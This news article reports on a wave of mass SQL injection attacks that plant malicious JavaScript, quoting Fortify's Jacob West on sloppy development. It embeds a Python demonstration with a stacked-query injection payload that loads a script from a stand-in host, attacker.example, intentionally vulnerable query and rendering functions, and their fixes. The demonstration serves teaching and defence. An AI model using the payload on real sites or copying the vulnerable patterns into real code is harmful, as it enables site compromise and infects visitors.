
Innovative site developers to blame for the current crop of SQL Web server attacks

Security firm Fortify Software says this week's reports of a rash of SQL injection attacks on Web sites should make software developers sit up and take notice.

"Newswire reports suggest that hundreds of thousands of Web sites have been hit by a mass SQL attack. This is symptomatic of hackers developing highly sophisticated and semi-automated attack routines," said Jacob West, Manager of Fortify's Security Research Group.

West added that “The script or tool behind the attack uses Google to search for sites that include a file type and parameter that appear to often be susceptible to SQL injection and uses that list returned from Google to mount its attack.

The attack uses the SQL injection vulnerability to mount a persistent cross-site scripting attack that embeds malicious JavaScript/HTML in the vulnerable application and infects all visitors to the infected site until it is explicitly identified and removed.”
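The chain West describes, shown as an added example that is not code from the article or from Fortify: a request parameter spliced into SQL lets one injected value append a script tag to every row of a content column, and the page then serves that tag to each visitor. It runs against a constructed SQLite database; the table layout, function names and the attacker URL are assumptions made for the demonstration. The hardened versions sit beside the vulnerable ones: input validation plus a bound parameter on the way in, and HTML encoding on the way out.

```python
"""Added example, not code from the article or from Fortify: the injection-to-
stored-XSS chain described above, run against a constructed SQLite database,
beside the parameterized and output-encoded fix. Table layout, function
names and the attacker URL are assumptions made for the demonstration."""
import html
import sqlite3

# Constructed payload tag; a real attack points at an attacker-controlled host.
ATTACKER_SCRIPT = '<script src="http://attacker.example/x.js"></script>'

# What the ?id= parameter looks like once an attack tool has filled it in:
# the expected integer, then a second statement that appends the tag to
# every row of the content column.
PAYLOAD = "1; UPDATE articles SET body = body || '%s' WHERE 1 = 1" % ATTACKER_SCRIPT


def make_db():
    """Constructed sample content: two articles, nothing malicious."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (
            id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER DEFAULT 0);
        INSERT INTO articles (id, title, body) VALUES (1, 'Welcome', 'Hello, world.');
        INSERT INTO articles (id, title, body) VALUES (2, 'News', 'Second article.');
    """)
    return conn


def count_view_vulnerable(conn, article_id):
    """Hit counter that splices the request parameter straight into SQL.
    executescript() stands in for a database driver that accepts stacked
    statements, which is what lets one injected parameter rewrite every row."""
    conn.executescript(
        "UPDATE articles SET views = views + 1 WHERE id = %s;" % article_id)


def count_view_fixed(conn, article_id):
    """Same counter with input validation and a bound parameter: the value is
    checked to be an integer and can only ever reach the database as data."""
    conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?",
                 (int(article_id),))


def render_vulnerable(conn, article_id):
    """Emits database content into HTML unencoded, so anything stored in
    `body` is executed by every visitor's browser."""
    row = conn.execute("SELECT title, body FROM articles WHERE id = ?",
                       (article_id,)).fetchone()
    return "<h1>%s</h1><div>%s</div>" % row


def render_fixed(conn, article_id):
    """Same page with HTML encoding on output: a stored tag is shown as text,
    not executed, even if the database has already been tampered with."""
    row = conn.execute("SELECT title, body FROM articles WHERE id = ?",
                       (article_id,)).fetchone()
    return "<h1>%s</h1><div>%s</div>" % tuple(html.escape(v) for v in row)


def infected_rows(conn):
    """How many articles now carry the injected tag."""
    return conn.execute("SELECT COUNT(*) FROM articles WHERE body LIKE ?",
                        ("%" + ATTACKER_SCRIPT + "%",)).fetchone()[0]


def demo_vulnerable():
    """One request carrying the payload poisons both articles; rendering
    article 2, which the attacker never named, now serves the script."""
    conn = make_db()
    count_view_vulnerable(conn, PAYLOAD)
    return infected_rows(conn), render_vulnerable(conn, 2)


def demo_fixed():
    """Validation rejects the payload before any SQL runs, and the page is
    rendered from untouched content."""
    conn = make_db()
    try:
        count_view_fixed(conn, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return rejected, infected_rows(conn), render_fixed(conn, 2)


def demo_encoding_only():
    """Defence in depth: if the database was already poisoned through some
    other hole, output encoding keeps the tag inert on the page."""
    conn = make_db()
    count_view_vulnerable(conn, PAYLOAD)
    return render_fixed(conn, 2)
```

The two fixes are independent and both are needed: the bound parameter stops the database from being written through the parameter, and output encoding means content that did get in (through this hole or any other) is displayed rather than executed. Note that binding alone, without the `int()` check, would silently update zero rows here; the validation is what turns a malformed identifier into a visible error.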

According to West, the current crop of SQL injection attacks appears to be the result of sloppy programming on the part of Web site developers.

"Although this wave of attacks targets an application vulnerability that is the result of poor programming, it is indicative of the larger problem that we in the software engineering and security fields need to provide developers with APIs that make getting security right easier and better tools and processes to ensure that the software they build with these APIs is secure," he said.

West added “SQL injection is a straightforward problem to identify and avoid when compared with other code-level vulnerabilities, but these attacks demonstrate that some organizations building web applications today are still woefully behind the bad guys.

The solution to this and similar problems is a software development lifecycle designed to build security into software from the ground up. Security is a critical attribute during the design, building, testing and deployment phases. Software developed without a full-lifecycle approach and the right tools to support each phase is destined to suffer security compromises like the one seen here."

Désiré has been musing and writing about technology during a career spanning four decades. He dabbled in website building and web hosting when DHTML and frames were en vogue and started writing about the impact of technology on society just before the start of the Y2K hysteria at the turn of the last millennium. Following an eight-year stint at ITProPortal.com where he discovered the joys of global tech-fests, Désiré now heads up TechRadar Pro. Previously he was a freelance technology journalist at Incisive Media, Breakthrough Publishing and Vnunet, and Business Magazine. He also launched and hosted the first Tech Radio Show on Radio Plus.